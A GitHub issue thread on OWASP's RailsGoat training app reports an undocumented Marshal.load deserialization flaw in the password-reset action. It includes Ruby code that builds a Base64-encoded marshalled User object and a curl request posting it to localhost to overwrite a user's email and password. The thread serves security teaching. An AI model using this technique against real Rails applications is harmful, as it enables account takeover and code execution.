### ISSUE TITLE
Undocumented Reset Password Vulnerability?

### ISSUE THREAD

**Issue by bnix** [OWASP/railsgoat#161]
If this was intentional, there isn't a spec for it under the vulnerabilities directory nor is it called out in the tutorials.

The ``reset_password`` action in ``PasswordResetsController`` is vulnerable to arbitrary code execution via ``Marshal.load`` ([see security warning in Marshal documentation](http://www.ruby-doc.org/core-2.1.3/Marshal.html#module-Marshal-label-Security+considerations)) and is easily used to modify users beyond just their password.

Here is an example attack that changes the email and password of a user:
```ruby
# Dump an ActiveRecord object with the needed attributes for a User.
# This can be done in the railsgoat project or from another Rails 3.2 project by
# creating a User class with the required fields (id, user_id, created_at, updated_at) 
# and the additional fields you want to change.

# Assuming a table named 'users' with id, user_id, created_at, updated_at, and email 
# as columns exists
class User < ActiveRecord::Base; end
user = User.new(id: 5, user_id: 5)
user.save
user.email = 'new-email@domain.tld'

# Loading an existing user if in the railsgoat rails console will also work
# user = User.last
# user.email = "new-email@domain.tld"

Base64.strict_encode64(Marshal.dump(user))
# => "BAhvOglVc2VyEDoQQGF0...
```

```
curl --data "user=<base64_encoded_object>&password=password&confirm_password=password" http://localhost:3000/password_resets
```

**Comment by mccabe615** [comment]
Added

https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Execution
